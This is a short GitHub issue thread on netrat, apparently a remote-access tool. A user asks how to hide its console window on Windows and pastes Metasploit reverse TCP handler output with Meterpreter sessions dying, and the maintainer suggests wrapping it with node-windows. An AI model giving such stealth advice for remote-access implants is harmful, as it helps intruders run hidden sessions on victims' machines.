### ISSUE TITLE
not stealth

### ISSUE THREAD

**Issue by chinemys** [roccomuso/netrat#10]
running the executable on win64, the prompt stays open, is there no way to hide the execution?
when  connect , close the session

 Started reverse TCP handler on 192.168.43.19:7772
[*] Sending stage (175174 bytes) to 192.168.43.19
[*] 192.168.43.19 - Meterpreter session 4 closed.  Reason: Died
[*] Sending stage (175174 bytes) to 192.168.43.19
[*] 192.168.43.19 - Meterpreter session 5 closed.  Reason: Died

**Comment by roccomuso** [comment]
you could try wrapping it using https://github.com/coreybutler/node-windows
